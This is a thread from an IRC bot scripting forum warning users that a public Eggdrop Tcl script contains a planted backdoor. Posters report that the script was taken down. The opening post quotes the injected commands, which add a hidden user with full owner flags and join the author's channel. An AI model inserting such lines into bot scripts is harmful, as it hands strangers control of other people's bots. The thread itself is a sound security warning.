This is the new home of the egghelp.org community forum.
All data has been migrated (including user logins/passwords) to a new phpBB version.

For more information, see this announcement post. Click the X in the top right-corner of this box to dismiss this message.

WARNING DO NOT USE THIS SCRIPT!

Website and forum-related announcements and discussion, and anything else that doesn't fit in the above forums.
W
Wulfe
Voice

WARNING DO NOT USE THIS SCRIPT!

Post by Wulfe »

A Script
Added 27 August 2010

TxtGhOsT 3.3.1 27/08/2010 RaYaN Public command channel management script. An advanced version of NicePaL. Will help you to do anything without getting in the partyline.

This script is a fraud!
DO NOT USE IT

throught the script in several spots, i counted around 6
he has placed this code

Code: Select all

channel add #PakBots
     adduser MoOoN MoOoN!*kAmOsH@*
     chattr MoOoN efhjlmnoptvwxIQ
     setuser MoOoN HOSTS -telnet!*@*

If you don't want your bot hijacked by some ass of a user putting malicious code in to your bot then do NOT use this script. and to you mr RaYaN for shame. its people like you that give us coders a bad name. go back into whatever hole you crawled out of and rot there you are a terrible person for putting this in to your scripts and i hope you get what you deserve for it.
spithash
Master

Post by spithash »

jee thank you for this, Wulfe :)

he already got what he deserved. his channel is frozen.

Code: Select all

[08:16:29] -ChanServ(service@dal.net)- Info for #pakbots:
[08:16:29] -ChanServ(service@dal.net)- The channel #pakbots is frozen and cannot be used.
[08:16:29] -ChanServ(service@dal.net)- *** End of Info ***
Libera ##rtlsdr & ##re - Nick: spithash
Click here for troll.tcl
W
Wulfe
Voice

Post by Wulfe »

I am glad he got served on this. I would also like to update that I have tracked down the original script he ripped off for this. It is actually quite a useful script with all the Trojans removed. You can thank our resident egghelp coder NicePal for this =)

Get his original version this guy ripped off here: http://www.egghelp.org/cgi-bin/tcl_arch ... oad&id=661
Version: 2.1.3
Date: 03/09/2002
Author: NicePaL
Desc: General script with useful functions for ident, adding/removing users, public commands, and more. Now includes help file.
caesar
Mint Rubber

Post by caesar »

This would have been taken care faster if you would have contacted slennox. I would have expected him to notice this topic sooner but guess he was busy with real life, I caught him just before going to bed and removed the script. :D Anyway, thanks for the heads-up. :)
Once the game is over, the king and the pawn go back in the same box.
v
vinil
Voice

Post by vinil »

I am so glad that you have informed us of this fraud script. Recently, I came to see this new script in one of the forums and I was wondering whether I should check it. You saved me from a lot of trouble Wulfe or else I would’ve right now been fighting with the bots.
“Read Today, Lead Tomorrow”
J
Johannes13
Halfop

Post by Johannes13 »

Lol, I checked the script, and there are still some (well) hidden backdoors in it... (Would allow me and others with a full brain and a knowledge of the script to execute arbitrary tcl commands, including, but not limited to exec or file delete)

I'd suggest against the use of even the unmodified original script...